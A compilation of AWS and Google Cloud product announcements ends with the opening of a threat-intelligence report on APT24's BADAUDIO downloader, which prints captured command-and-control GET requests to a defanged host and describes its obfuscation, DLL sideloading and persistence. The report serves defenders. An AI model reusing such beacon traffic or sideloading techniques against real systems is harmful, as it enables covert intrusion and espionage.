Amazon OpenSearch Serverless now supports AWS PrivateLink for secure and private connectivity to management console. With AWS PrivateLink, you can establish a private connection between your virtual private cloud (VPC) and Amazon OpenSearch Serverless to create, manage, and configure your OpenSearch Serverless resources without using the public internet. By enabling private network connectivity, this enhancement eliminates the need to use public IP addresses or relying solely on firewall rules to access OpenSearch Serverless. With this feature release the OpenSearch Serverless management and data operations can be securely accessed through PrivateLinks. Data ingestion and query operations on collections still requires OpenSearch Serverless provided VPC endpoint configuration for private connectivity as described in the OpenSearch Serverless VPC developer guide.
You can use PrivateLink connections in all AWS Regions where Amazon OpenSearch Serverless is available. Creating VPC endpoints on AWS PrivateLink will incur additional charges; refer to AWS PrivateLink pricing page for details. You can get started by creating an AWS PrivateLink interface endpoint for Amazon OpenSearch Serverless using the AWS Management Console, AWS Command Line Interface (CLI), AWS Software Development Kits (SDKs), AWS Cloud Development Kit (CDK), or AWS CloudFormation. To learn more, refer to the documentation on creating an interface VPC endpoint for management console.
Recycle Bin for Amazon EBS, which helps you recover accidentally deleted snapshots and EBS-backed AMIs, now supports EBS Volumes. If you accidentally delete a volume, you can now recover it directly from Recycle Bin instead of restoring from a snapshot, reducing your recovery point objective with no data loss between the last snapshot and deletion. Your recovered volume can immediately achieve the full performance without waiting for data to download from snapshots.
To use Recycle Bin, you can set a retention period for deleted volumes, and you can recover any volume within that period. Recovered volumes are immediately available and will retain all attributes—tags, permissions, and encryption status. Volumes not recovered are deleted permanently when the retention period expires. You create retention rules to enable Recycle Bin for all volumes or specific volumes, using tags to target which volumes to protect.
EBS Volumes in Recycle Bin are billed at the same price as EBS Volumes, read more on the pricing page. To get started, read the documentation. The feature is now available through the AWS Command Line Interface (CLI), AWS SDKs, or the AWS Console in all AWS commercial, China, and AWS GovCloud (US) Regions.
Earlier this year we launched Nano Banana (Gemini 2.5 Flash Image). It became the top rated image model in the world, and we were excited to see the overwhelming response from our customers. Nano Banana made it dramatically easier – and more fun – to edit images with natural language and make visuals with consistent characters.
Today, we’re announcing Nano Banana Pro (Gemini 3 Pro Image), our state-of-the art image generation and editing model, available starting today in Vertex AI and Google Workspace, and coming soon to Gemini Enterprise. Nano Banana Pro excels in visual design, world knowledge, and text generation, making it easier for enterprises to:
Deploy localized global campaigns faster. The model supports text rendering in multiple languages. You can even take an image and translate the text inside it, so your creative work is ready for other countries immediately.
Create more accurate, context-rich visual assets. Because Nano Banana Pro connects to Google Search, it understands the real world context. This means you can generate maps, diagrams, and infographics that get the facts and details right — perfect for training manuals or technical guides where accuracy matters.
Maintain stronger creative control and brand fidelity. Keeping brand, product, or character consistency is often the biggest challenge when using AI for creative assets. Nano Banana Pro keeps your creative team in the driver’s seat with our expanded visual context window. Think of this as “few-shot prompting” for designers: by allowing you to upload up to 14 reference images, you can now load a full style guide simultaneously—including logos, color palettes, character turnarounds, and product shots. This ensures the model has the complete context needed to match your brand identity. Need to refine the result? Just describe the change using natural language to add, remove, or replace details. Nano Banana Pro supports up to 4K images for a higher level of detail and sharpness across multiple aspect ratios.
Nano Banana Pro and Nano Banana are designed to power a complete creative workflow. Start with Nano Banana for high-velocity ideation, then transition to Nano Banana Pro when you need the highest fidelity for production-ready assets.
Supporting your commercial needs: Both models fall under our shared responsibility framework, and you can ensure transparency and responsible use with built-in SynthID watermarking on every generated asset. We’re committed to supporting your commercial needs with copyright indemnification coming at general availability.
Prompt: Translate all the English text on the three yellow and blue cans into Korean, while keeping everything else the same
Search grounding: Nano Banana Pro can use Google Search to research topics based on your query, and reason on how to present factual and grounded information.
Prompt: Create an infographic that shows how to make elaichi chai.
Advanced composition: Add up to 14 input reference images to combine elements, blend scenes, and transfer designs to create something entirely new. Nano Banana Pro maintains the quality of a developed asset but delivers it in minutes.
Prompt: Editorial style photo, female model is wearing jeans, yellow top with polka dots, headband, red heels, black bag on her arm. She is holding an iced matcha latte in one hand and in the other hand she is holding a leash on a chow chow dog. She is standing in front of the house in Beverly Hills, looking into the camera. Respect the overall aesthetic and color palette of the photo with the house. There is a white logo “Love Letters” with 10% opacity shadow in the lower left corner.
Advanced text rendering: Generate clear, accurate text within images, unlocking use cases for product mockups, posters, and educational diagrams. This could include natural text placement (e.g., wrapping text around an object) and support for various fonts and styles.
Prompt: Create an image showing the phrase “How much wood would a woodchuck chuck if a woodchuck could chuck wood” made out of wood chucked by a woodchuck.
Powering the platforms that power creatives
Nano Banana Pro is becoming an essential infrastructure layer for the creative economy, powering the design platforms that creatives rely on. By integrating our models directly into their workflows, we are helping industry leaders like Adobe, Figma, and Canva deliver next-generation AI capabilities. Here’s what they have to say about building on our foundation:
“With Google’s Nano Banana Pro now in Adobe Firefly and Photoshop, we’re giving creators and creative professionals yet another best-in-class image model they can tap into alongside Adobe’s powerful editing tools to turn ideas into high-impact content with full creative control. It’s an exciting step in our partnership with Google to help everyone create with AI.” — Hannah Elsakr, vice president, New Gen AI Business Ventures, Adobe
“Nano Banana Pro is a revolution for AI image editing. We’ve been surprised and amazed by its visual powers and prompt understanding. One key upgrade is its ability to translate and render text across multiple languages; which is very important as we work to empower the world to design anything at Canva.” — Danny Wu, Head of AI Products at Canva
“With Nano Banana Pro in Figma, designers gain a tool that is creative and precise at the same time, producing perspective shifts, lighting changes, and full scene variations with dependable style and character consistency.” — Loredana Crisan, Chief Design Officer, Figma
“At Photoroom we serve some of the largest fashion marketplaces and retailers in the world, empowering brands to visualize future collections instantly and bring products to market faster. Leveraging Nano Banana Pro, we’ve enhanced our Virtual Fashion Model and Change Fabric Color workflow to make apparel transformation more flexible and realistic than ever.” — Matt Rouif, CEO, Photoroom
The world’s leading agencies and brands are delivering results
We’re moving from experimentation to enterprise-grade production, where efficiency and performance shine.
This model makes product-based image editing much easier. After testing multi-product swaps, it handled complex edits with impressive coherence and minimal prompt fuss. It’s incredibly scalable for creative teams who care about quality and speed. — Juliette Suvitha, Head of Creative at Pencil
“HubX is using Nano Banana Pro to edit, retouch, expand, and upscale photos with AI — delivering significant improvements in identity preservation, context awareness, and output resolution quality. It’s allowing anyone, regardless of technical background, to create professional-grade visuals effortlessly.” — Kaan Ortabas, Co-Founder, HubX
“The new Nano Banana Pro model has completely eliminated the friction between idea and execution. Imagination is now the only limitation. This newfound creative velocity isn’t just theory either, it’s already powering our marketing asset production.” — David Sandström, CMO, Klarna
Nano Banana Pro is a step forward in quality and can help us unlock even better image generation for merchants— Matthew Koenig, Senior Staff Product Manager, Shopify
“Our early Nano Banana Pro tests are impressive. It integrates smoothly into our pipeline and delivers noticeably better quality. Lighting feels real, scenes more natural, and product accuracy sharper. This is a meaningful step forward in visual content creation.” – Bryan Godwin, Director, Visual AI, Wayfair
“WPP received early access to Nano Banana Pro in WPP Open, through our expanded AI partnership. The model has already impacted creative and production workflows, with tests performed for our clients such as Verizon allowing us to translate creative concepts to assets with speed and scale. Improvements in text fidelity and reasoning allow us to push the boundaries of Generative Media for more complex use cases, such as product infographics and localization. We’re so excited to bring the power of this model and our Google partnership to our shared clients.” — Elav Horwitz, Chief Innovation Officer, WPP
We’re making Nano Banana Pro available where your teams already work, keeping you in the driver’s seat:
For developers:You can start building with Nano Banana Pro in the Gemini API today in Vertex AI. For those building with Vertex AI, Nano Banana Pro is an enterprise-grade offering that includes Provisioned Throughput, Pay As You Go, and advanced safety filters.
For business teams:Nano Banana is available in Gemini Enterprise with Nano Banana Pro coming soon. Gemini Enterprise is our advanced agentic platform that brings the best of Google AI to every employee, for every workflow. And, starting today, Nano Banana Pro is rolling out to Google Workspace customers in Google Slides, Vids, the Gemini app, and NotebookLM — learn more.
With BigQuery, our goal is to allow you to extract valuable insights from your data, regardless of how much there is, or where it’s from. A key part of how we do this is our BigQuery Data Transfer Service, which automates and streamlines data loading into BigQuery from a wide variety of sources.
As a fully managed service, BigQuery Data Transfer Service offers a variety of benefits:
Simplicity: Eliminate the need for infrastructure management or complex coding. Whether you use the UI, API, or CLI, getting started with data loading is easy.
Scalability: Used by tens of thousands of customers each month, Data Transfer Service easily handles massive data volumes and high numbers of concurrent users, accommodating demanding data transfer jobs.
Security: Your data’s safety is paramount. Data Transfer Service employs robust security measures like encryption, authentication, and authorization. And as you’ll see below, we’ve significantly expanded its ability to support regulated workloads without compromising ease of use.
Cost-effectiveness: Many first-party connectors, like those for Google Ads and YouTube, are provided at no cost. And for a growing list of third-party connectors, we offer consumption-based pricing that’s highly price-competitive, so you can unify your data cost-effectively.
Based on your feedback, we expanded the BigQuery Data Transfer Service connector ecosystem, enhancing security and compliance, and improving the overall user experience. Let’s dive into the latest updates.
Key feature updates
Expanded data connectivity
We are thrilled to announce that several highly-requested connectors are now generally available:
Oracle: Integrate your key operational databases with BigQuery for enhanced analysis and reporting.
SalesforceandServiceNow: Build unified customer profiles and bring in your IT service management data to gain operational insights.
Salesforce Marketing Cloud (SFMC) andFacebook Ads: Ingest your marketing and analytics data into BigQuery for comprehensive analysis and campaign optimization.
Google Analytics 4 (GA4): A major milestone for your marketing analytics, now you can build production marketing analysis pipelines with GA4 data.
These new additions join the quickly growing list of existing connectors, including Amazon S3, Amazon Redshift, Azure Blob Storage, Campaign Manager, Cloud Storage, Comparison Shopping Service (CSS) Center, Display & Video 360, Google Ad Manager, Google Ads, Google Merchant Center, Google Play, MySQL, PostgreSQL, Search Ads 360, Teradata, YouTube Channel, and YouTube Content Owner.
New connectors in preview
We are also excited to launch new connectors in preview, further expanding our ecosystem:
StripeandPayPal: Ingest financial and transaction data into BigQuery for revenue analysis, refund tracking, and customer behavior insights.
Snowflake (migration connector): Migrate your data from Snowflake with features like key pair authentication, auto schema detection, and support for migrating data residing on all three major clouds (Google Cloud, AWS, and Azure).
Hive managed tables (migration connector): This connector supports Metadata and Tables migration for Hive and Iceberg from on-prem and self-hosted cloud Hadoop environments to Google Cloud. This lets you perform one-time migrations and synchronize incremental updates of Hive and Iceberg tables, with Iceberg tables being registered with BigLake metastore, and Iceberg and Hive tables registered with Dataproc Metastore.
Enhancements to existing connectors and platform capabilities
Google Cloud Storage: We are excited to announce the GA of event-driven transfers. Now, your data transfers can trigger automatically the moment a new file arrives in your Cloud Storage bucket, for near-real-time data pipelines.
Salesforce: CRM users get an efficiency boost with incremental ingestion now available in preview. Data Transfer Service now intelligently loads only new or modified records, saving time and compute resources.
SA360: The recently updated Search Ads 360 connector now includes full support for Performance Max (PMax) campaigns, so you can analyze data from Google’s latest campaign types.
Google Ad Manager: We improved data freshness for the Google Ad Manager connector by rolling out incremental updates for DT files. Google Ad Manager adds the Google Ad Manager DT files into the Cloud Storage bucket. A transfer run then incrementally loads the new Google Ad Manager DT files from the Cloud Storage bucket into the BigQuery table without reloading files that have already been transferred.
Oracle: We significantly enhanced the Oracle connector to support the ingestion of tables containing millions of records, ensuring that even your largest and most critical datasets can be transferred to BigQuery.
Enhanced security and compliance
To continue to meet your stringent security and compliance needs, we’re also investing in our infrastructure.
Access transparency: Along with BigQuery, we’ve extended Data Transfer Service administrative access controls to customer-identifiable metadata. Administrative access controls (access transparency, access approval, and personnel controls) is a feature of Cloud services that gives customers real-time notifications of when, why, and how Google personnel access their user content. This new capability applies access transparency controls to reads of customer-defined attributes and any customer service configuration that may be used to identify the customer or customer workloads.
EU Data Boundary: We are excited to announce GA of Data Transfer Service for EU Data Boundary and Sovereign Controls compliance programs in the EU, including EU regions support with Data Boundary with Access Justifications and Sovereign Controls by Partners. This enables customers to expand their workloads on Google Cloud in regulated markets.
FedRAMP High: We successfully implemented the security controls required to launch Data Transfer Service into the FedRAMP High compliance regime. This will allow U.S. government, civilian agencies, and contractors to expand their adoption of FedRAMP High regulated workloads on Google Cloud.
CJIS Compliance: We launched BigQuery Data Transfer Service for Criminal Justice Information Services (CJIS) compliance. Data Transfer Service now meets the security standards of the CJIS Security Policy, enabling U.S. state, local, and tribal law enforcement and criminal justice organizations to handle sensitive information using our service.
Custom organization policies: We announced the GA of custom organization policies so you can allow or deny specific operations on Data Transfer Service transfer configurations, to help meet your organization’s compliance and security requirements.
Regional endpoints: We enabled regional endpoints for the Data Transfer Service API. Regional endpoints are request endpoints that ensure requests are only processed if the resource exists in the specified location. This way, workloads can comply with data residency and data sovereignty requirements by maintaining data at rest and in transit within the specified location.
Key tracking: You can now use key usage tracking to see which storage resources are protected by each of your Cloud KMS keys. For more information, learn how to view key usage.
Proactive threat mitigation: We recently completed a detailed, proactive threat modeling exercise for the entire BigQuery Data Transfer Service. This in-depth review allowed us to identify and mitigate high-priority security risks, further hardening the platform against potential threats.
An intuitive and unified user experience
We’ve made significant investments to the BigQuery user experience to make data ingestion simpler and more intuitive.
The “Add Data” experience in the BigQuery UI now provides a single, simplified entry point to guide you through the data-loading process. Whether you’re a seasoned data engineer or a new analyst, this wizard-like workflow makes it easy to discover and configure transfers from any source, removing the guesswork and getting you to insights faster.
Finally, to further streamline the setup process, the BigQuery Data Transfer Service API is now enabled by default for new BigQuery projects. This removes a manual step, so that data transfer capabilities are immediately available to everyone getting started with BigQuery.
A new, consumption-based pricing model
As we graduate more third-party connectors from preview to GA, we introduced a new pricing model that reflects their status as fully supported, production-ready services.
This new consumption-based model applies to our third-party SaaS and database connectors (e.g., Salesforce, Facebook Ads, Oracle, MySQL, and others) and takes effect only when a specific connector becomes generally available.
Key details of the model:
Free in preview: All connectors remain completely free of charge during the preview phase. This allows you to test, experiment, and validate new integrations without any financial commitment.
Competitive pricing: Pricing is highly competitive, to help you feel comfortable loading data from critical sources.
Consumption-based: You are billed based on the compute resources consumed by your data transfers, measured in slot-hours.
This change allows us to continue investing in building a robust and scalable data transfer platform. For more detailed information, please visit the officialBigQuery pricing page.
Looking ahead
The journey continues! We are committed to building features that streamline your data pipelines and unlock new levels of insight. As you can see from the extensive new list of connectors in preview, we are continuing to innovate rapidly in migration, marketing analytics, operational databases, and enterprise applications.
Experience the power of BigQuery Data Transfer Service for yourself. Simplify your data loading process and accelerate your time to insights. Want to stay informed about the BigQuery Data Transfer Service? Join our email group for future product announcements and updates at https://groups.google.com/g/bigquery-dts-announcements.
In a world of agentic AI, building an agent is only half the battle. The other half is understanding how users are interacting with it. What are their most common requests? Where do they get stuck? What paths lead to successful outcomes? Answering these questions is the key to refining your agent and delivering a better user experience. These insights are also super critical for optimizing agent performance.
Today, we’re making it easier for agent developers in Google’s Agent Development Kit (ADK) to answer these questions. With a single line of code, ADK developers can stream agent interaction data directly to BigQuery and get insights into their agent activity in a scalable manner. To do so, we are introducingBigQuery Agent Analytics, a new plugin for ADK that exports your agent’s interaction data directly into BigQuery to capture, analyze, and visualize agent performance, user interaction, and cost.
With your agent interaction data centralized in BigQuery, analyzing critical metrics such as latency, token consumption, and tool usage is straightforward. Creating custom dashboards in tools like Looker Studio or Grafana is easy. Furthermore, you can leverage cutting-edge BigQuery capabilities includinggenerative AI functions, vector search, and embedding generation, to perform sophisticated analysis. This enables you to cluster agent interactions, precisely gauge agent performance, and rapidly pinpoint common user queries or systemic failure patterns — all of which are essential for refining the agent experience. You can also join interaction data with relevant business datasets — for instance, linking support agent interactions with CSAT scores — to accurately measure the agent’s real-world impact. This entire capability is unlocked with a minimal code change.
This plugin is available in preview for ADK users today, with support for other agent frameworks soon to follow.
See the plugin in action in the following video.
Understanding BigQuery Agent Analytics
The BigQuery Agent Analytics plugin is a very lightweight way of streaming various agent activity data directly to your BigQuery table. It consists of three main components:
ADK Plugin: With a single line of code, the new ADK plugin can stream agent activity like requests, responses, LLM tool calls, etc. to a BigQuery table.
Predefined BigQuery schema:We provide an optimized table schema out-of-the-box that stores rich details about user interactions, agent responses, and tool usage.
Low-cost, high-performance streaming:The plugin uses the BigQuery Storage Write API to stream events directly to BigQuery in real-time.
Why it matters: Data-driven agent development
By integrating your agent’s analytic data in BigQuery, you can go from viewing basic metrics to generating deep, actionable insights. Specifically, this integration lets you:
Visualize agent usage and interactions:Gain a clear understanding of your agent’s performance. Easily track key operational metrics like token consumption and tool usage to monitor costs and resource allocation.
Evaluate agent quality with advanced AI:Go beyond simple metrics by using BigQuery’s advanced AI capabilities. Leverage AI functions and vector search to perform quality analysis on conversation data, identifying areas for improvement with greater precision.
Learn by conversing with your agent data:Create a conversational data agent that works directly with your new observability data. This allows you and your team to ask questions about your agent activity in natural language and get immediate insights, without writing complex queries.
How It works
We’ve designed the process of setting up robust analytics pipeline to be as simple as possible:
1. Add the required code: This plugin requires use of ADK’s application(apps) componentwhen building the agent. The following code demonstrates how to initialize the new plugin and make it part of your app.
code_block
<ListValue: [StructValue([(‘code’, ‘# — Initialize the Plugin —rnbq_logging_plugin = BigQueryAgentAnalyticsPlugin(rn project_id=PROJECT_ID, rn dataset_id=DATASET_ID, rn table_id=”agent_events” # Optional rn)rnrn# — Initialize Model and the root agent —rnllm = Gemini(rn model=”gemini-2.5-flash”,rn)rnrnroot_agent = Agent(rn model=llm,rn name=’my_adk_agent’,rn instruction=”You are a helpful assistant”rnrn)rnrn# — Create the App —rnapp = App(rn name=”my_adk_agent”,rn root_agent=root_agent,rn plugins=[bq_logging_plugin], # Register the plugin herern)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7f4e2c549b80>)])]>
2. Choose what to stream and customize pre-processing:You have full control over what data you send to BigQuery. Choose the specific events you want to stream, so that you only capture the data that is most relevant to your needs. The following code example redacts dollar amounts before logging.
code_block
<ListValue: [StructValue([(‘code’, ‘import jsonrnimport rernrnfrom google.adk.plugins.bigquery_agent_analytics_plugin import BigQueryLoggerConfigrnrnrndef redact_dollar_amounts(event_content: Any) -> str:rn “””rn Custom formatter to redact dollar amounts (e.g., $600, $12.50)rn and ensure JSON output if the input is a dict.rn “””rn text_content = “”rn if isinstance(event_content, dict):rn text_content = json.dumps(event_content)rn else:rn text_content = str(event_content)rnrn # Regex to find dollar amounts: $ followed by digits, optionally with commas or decimals.rn # Examples: $600, $1,200.50, $0.99rn redacted_content = re.sub(r’\$\d+(?:,\d{3})*(?:\.\d+)?’, ‘xxx’, text_content)rn return redacted_contentrnrnconfig = BigQueryLoggerConfig(rn enabled=True,rn event_allowlist=[“LLM_REQUEST”, “LLM_RESPONSE”], # Only log these eventsrn shutdown_timeout=10.0, # Wait up to 10s for logs to flush on exitrn client_close_timeout=2.0, # Wait up to 2s for BQ client to closern max_content_length=500, # Truncate content to 500 chars (default)rn content_formatter=redact_dollar_amounts, # Redact the dollar amounts in the logging contentrn)rnrnplugin = BigQueryAgentAnalyticsPlugin(…, config=config)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7f4e2c549040>)])]>
And that’s it — the plugin handles the rest, including auto-creating the necessary BigQuery table with the correct schema, and streaming the agent data in real-time.
Now you are ready to analyze your agent metrics, using familiar BigQuery semantics. Here is an illustration of your logs as they appear in the BigQuery table using a “select * limit 10” on non-empty columns.
Get started today
It’s time to unlock the full potential of your agents. With the new BigQuery Agent Analytics you can answer critical usage questions to refine your agent, optimize performance, and deliver a superior user experience.There is more to come in the near future, including integration with LangGraph to advanced analysis for multimodal agent interactions.
AWS announces the general availability of Cloud WAN Routing Policy providing customers fine-grained controls to optimize route management, control traffic patterns, and customize network behavior across their global wide-area networks.
AWS Cloud WAN allows you to build, monitor, and manage a unified global network that interconnects your resources in the AWS cloud and your on-premises environments. Using the new Routing Policy feature, customers can perform advanced routing techniques such as route filtering and summarization to have better control on routes exchanged between AWS Cloud WAN and external networks. This feature enables customers to build controlled routing environments to minimize route reachability blast radius, prevent sub-optimal or asymmetric connectivity patterns, and avoid over-running of route-tables due to propagation of unnecessary routes in global networks. In addition, this feature allows customers to set advanced Border Gateway Protocol (BGP) attributes to customize network traffic behavior per their individual needs and build highly resilient hybrid-cloud network architectures. This feature also provides advanced visibility in the routing databases to allow rapid troubleshooting of network issues in complex multi-path environments.
The new Routing Policy feature is available in all AWS Regions where AWS Cloud WAN is available. You can enable these features using the AWS Management Console, AWS Command Line Interface (CLI) and the AWS Software Development Kit (SDK). There is no additional charge for enabling Routing Policy on AWS Cloud WAN. For more information, see the AWS Cloud WAN documentation pages.
AWS Glue now supports full snapshot and incremental load ingestion for new SAP entities using zero-ETL integrations. This enhancement introduces full snapshot data ingestion for SAP entities that lack complete change data capture (CDC) functionality, while also providing incremental data loading capabilities for SAP entities that don’t support the Operational Data Provisioning (ODP) framework. These new features work alongside existing capabilities for ODP-supported SAP entities, to give customers the flexibility to implement zero-ETL data ingestion strategies across diverse SAP environments.
Fully managed AWS zero-ETL integrations eliminate the engineering overhead associated with building custom ETL data pipelines. This new zero-ETL functionality enables organizations to ingest data from multiple SAP applications into Amazon Redshift or the lakehouse architecture of Amazon SageMaker to address scenarios where SAP entities lack deletion tracking flags or don’t support the Operational Data Provisioning (ODP) framework. Through full snapshot ingestion for entities without deletion tracking and timestamp-based incremental loading for non-ODP systems, zero-ETL integrations reduce operational complexity while saving organizations weeks of engineering effort that would otherwise be required to design, build, and test custom data pipelines across diverse SAP application environments.
This feature is available in all AWS Regions where AWS Glue zero-ETL is currently available.
Amazon Braket now supports spending limits, enabling customers to set spending caps on quantum processing units (QPUs) to manage costs. With spending limits, customers can define maximum spending thresholds on a per-device basis, and Amazon Braket automatically validates each task submission doesn’t exceed the pre-configured limits. Tasks that would exceed remaining budgets are rejected before creation. For comprehensive cost management across all of Amazon Web Services, customers should continue to use the AWS Budgets feature as part of AWS Cost Management.
Spending limits are particularly valuable for research institutions managing quantum computing budgets across multiple users, for educational environments preventing accidental overspending during coursework, and for development teams experimenting with quantum algorithms. Customers can update or delete spending limits at any time as their requirements change. Spending limits apply only to on-demand tasks on quantum processing units and do not include costs for simulators, notebook instances, hybrid jobs, or tasks created during Braket Direct reservations.
Spending limits are available now in all AWS Regions where Amazon Braket is supported at no additional cost. Researchers at accredited institutions can apply for credits to support experiments on Amazon Braket through the AWS Cloud Credits for Research program. To get started, visit the Spending limits page in the Amazon Braket console and read our launch blog post.
Starting today, customers can run Apple macOS Tahoe (version 26) as Amazon Machine Images (AMIs) on Amazon EC2 Mac instances. Apple macOS Tahoe is the latest major macOS version, and introduces multiple new features and performance improvements over prior macOS versions including running Xcode version 26.0 or later (which includes the latest SDKs for iOS, iPadOS, macOS, tvOS, watchOS, and visionOS).
Backed by Amazon Elastic Block Store (EBS), EC2 macOS AMIs are AWS-supported images that are designed to provide a stable, secure, and high-performance environment for developer workloads running on EC2 Mac instances. EC2 macOS AMIs include the AWS Command Line Interface, Command Line Tools for Xcode, Amazon SSM Agent, and Homebrew. The AWS Homebrew Tap includes the latest versions of AWS packages included in the AMIs.
Apple macOS Tahoe AMIs are available for Apple silicon EC2 Mac instances and are published to all AWS regions where Apple silicon EC2 Mac instances are available today. Customers can get started with macOS Tahoe AMIs via the AWS Console, Command Line Interface (CLI), or API. Learn more about EC2 Mac instances here or get started with an EC2 Mac instance here. You can also subscribe to EC2 macOS AMI release notifications here.
Amazon MSK is a fully managed service for Apache Kafka and Kafka Connect that makes it easier for you to build and run applications that use Apache Kafka as a data store. Amazon MSK Serverless is a cluster type for Amazon MSK that allows you to run Apache Kafka without having to manage and scale cluster capacity. MSK Serverless automatically provisions and scales compute and storage resources, so you can use Apache Kafka on demand.
With these launches, Amazon MSK Serverless is now generally available in Asia Pacific (Sydney), Asia Pacific (Singapore), Asia Pacific (Mumbai), Asia Pacific (Tokyo), Asia Pacific (Seoul), Canada (Central), Europe (Frankfurt), Europe (Ireland), Europe (Stockholm), Europe (Paris), Europe (London), South America (São Paulo), US East (N. Virginia), US East (Ohio), and US West (Oregon) AWS regions. To learn more and get started, see our developer guide.
Amazon MQ now supports RabbitMQ version 4.2 which introduces native support for the AMQP 1.0 protocol, a new Raft based metadata store named Khepri, local shovels, and message priorities for quorum queues. RabbitMQ 4.2 also includes various bug fixes and performance improvements for throughput and memory management.
A key highlight of RabbitMQ 4.2 is the support of AMQP 1.0 as a core protocol offering enhanced features like modified outcome which allow consumers to modify message annotations before requeueing or dead lettering, and granular flow control, which offers benefits including letting a client application dynamically adjust how many messages it wants to receive from a specific queue. Amazon MQ has also introduced configurable resource limits for RabbitMQ 4.2 brokers which you can modify based on your application requirements. Starting from RabbitMQ 4.0, mirroring of classic queues is no longer supported. Non-replicated classic queues are still supported. Quorum queues are the only replicated and durable queue type supported on RabbitMQ 4.2 brokers, and now offer message priorities in addition to consumer priorities.
To start using RabbitMQ 4.2 on Amazon MQ, simply select RabbitMQ 4.2 when creating a new broker using the m7g instance type through the AWS Management console, AWS CLI, or AWS SDKs. Amazon MQ automatically manages patch version upgrades for your RabbitMQ 4.2 brokers, so you need to only specify the major.minor version. To learn more about the changes in RabbitMQ 4.2, see the Amazon MQ release notes and the Amazon MQ developer guide. This version is available in all regions where Amazon MQ m7g type instances are available today.
Amazon EC2 now supports Microsoft SQL Server 2025 with License-Included (LI) Amazon Machine Images (AMIs), providing a quick way to launch the latest version of SQL Server. By running SQL Server 2025 on Amazon EC2, customers can take advantage of the security, performance, and reliability of AWS with the latest SQL Server features.
Amazon creates and manages Microsoft SQL Server 2025 AMIs to simplify the provisioning and management of SQL Server 2025 on EC2 Windows instances. These images support version 1.3 of the Transport Layer Security (TLS) protocol by default for enhanced performance and security. These images also come with pre-installed software such as AWS Tools for Windows PowerShell, AWS Systems Manager, AWS CloudFormation, and various network and storage drivers to make your management easier.
SQL Server 2025 AMIs are available in all commercial AWS Regions and the AWS GovCloud (US) Regions.
To learn more about the new AMIs, see SQL Server AMIs User Guide or read the blog post.
Application Load Balancer (ALB) now offers Target Optimizer, a new feature that allows you to enforce a maximum number of concurrent requests on a target.
With Target Optimizer, you can fine-tune your application stack so that targets receive only the number of requests they can process, achieving higher request success rate, more target utilization, and lower latency. This is particularly useful for compute-intensive workloads. For example, if you have applications that perform complex data processing or inference, you can configure each target to receive as few as one request at a time, ensuring the number of concurrent requests is in line with the target’s processing capabilities.
You can enable this feature by creating a new target group with a target control port. Once enabled, the feature works with the help of an agent provided by AWS that you run on your targets that tracks request concurrency. For deployments that include multiple target groups per ALB, you have the flexibility to configure this capability for each target group individually.
You can enable Target Optimizer through the AWS Management Console, AWS CLI, AWS SDKs, and AWS APIs. ALB Target Optimizer is available in all AWS Commercial Regions, AWS GovCloud (US) Regions, and AWS China Regions. Traffic to target groups that enable Target Optimizer generates more LCU usage than regular target groups. For more information, see the pricing page, launch blog, and ALB User Guide.
Written by: Harsh Parashar, Tierra Duncan, Dan Perez
Google Threat Intelligence Group (GTIG) is tracking a long-running and adaptive cyber espionage campaign by APT24, a People’s Republic of China (PRC)-nexus threat actor. Spanning three years, APT24 has been deploying BADAUDIO, a highly obfuscated first-stage downloader used to establish persistent access to victim networks.
While earlier operations relied on broad strategic web compromises to compromise legitimate websites, APT24 has recently pivoted to using more sophisticated vectors targeting organizations in Taiwan. This includes the repeated compromise of a regional digital marketing firm to execute supply chain attacks and the use of targeted phishing campaigns.
This report provides a technical analysis of the BADAUDIO malware, details the evolution of APT24’s delivery mechanisms from 2022 to present, and offers actionable intelligence to help defenders detect and mitigate this persistent threat.
As part of our efforts to combat serious threat actors, GTIG uses the results of our research to improve the safety and security of Google’s products and users. Upon discovery, all identified websites, domains, and files are added to the Safe Browsing blocklist in order to protect web users across major browsers. We also conducted a series of victim notifications with technical details to compromised sites, enabling affected organizations to secure their sites and prevent future infections.
Figure 1: BADAUDIO campaign overview
Payload Analysis: BADAUDIO and Cobalt Strike Beacon Integration
The BADAUDIO malware is a custom first-stage downloader written in C++ that downloads, decrypts, and executes an AES-encrypted payload from a hard-coded command and control (C2) server. The malware collects basic system information, encrypts it using a hard-coded AES key, and sends it as a cookie value with the GET request to fetch the payload. The payload, in one case identified as Cobalt Strike Beacon, is decrypted with the same key and executed in memory.
GET https://wispy[.]geneva[.]workers[.]dev/pub/static/img/merged?version=65feddea0367 HTTP/1.1
Host: wispy[.]geneva[.]workers[.]dev
Cookie: SSID=0uGjnpPHjOqhpT7PZJHD2WkLAxwHkpxMnKvq96VsYSCIjKKGeBfIKGKpqbRmpr6bBs8hT0ZtzL7/kHc+fyJkIoZ8hDyO8L3V1NFjqOBqFQ==
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Connection: Keep-Alive
Cache-Control: no-cache
--------------------------
GET
cfuvid=Iewmfm8VY6Ky-3-E-OVHnYBszObHNjr9MpLbLHDxX056bnRflosOpp2hheQHsjZFY2JmmO8abTekDPKzVjcpnedzNgEq2p3YSccJZkjRW7-mFsd0-VrRYvWxHS95kxTRZ5X4FKIDDeplPFhhb3qiUEkQqqgulNk_U0O7U50APVE
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: Keep-Alive
Cache-Control: no-cache
Figure 2: BADAUDIO code sample
The malware is engineered with control flow flattening—a sophisticated obfuscation technique that systematically dismantles a program’s natural, structured logic. This method replaces linear code with a series of disconnected blocks governed by a central “dispatcher” and a state variable, forcing analysts to manually trace each execution path and significantly impeding both automated and manual reverse engineering efforts.
BADAUDIO typically manifests as a malicious Dynamic Link Library (DLL) leveraging DLL Search Order Hijacking (MITRE ATT&CK T1574.001) for execution via legitimate applications. Recent variants observed indicate a refined execution chain: encrypted archives containing BADAUDIO DLLs along with VBS, BAT, and LNK files.
These supplementary files automate the placement of the BADAUDIO DLL and a legitimate executable into user directories, establish persistence through legitimate executable startup entries, and trigger the DLL sideloading. This multi-layered approach to execution and persistence minimizes direct indicators of compromise.
Upon execution, BADAUDIO collects rudimentary host information: hostname, username, and system architecture. This collected data is then hashed and embedded within a cookie parameter in the C2 request header. This technique provides a subtle yet effective method for beaconing and identifying compromised systems, complicating network-based detection.
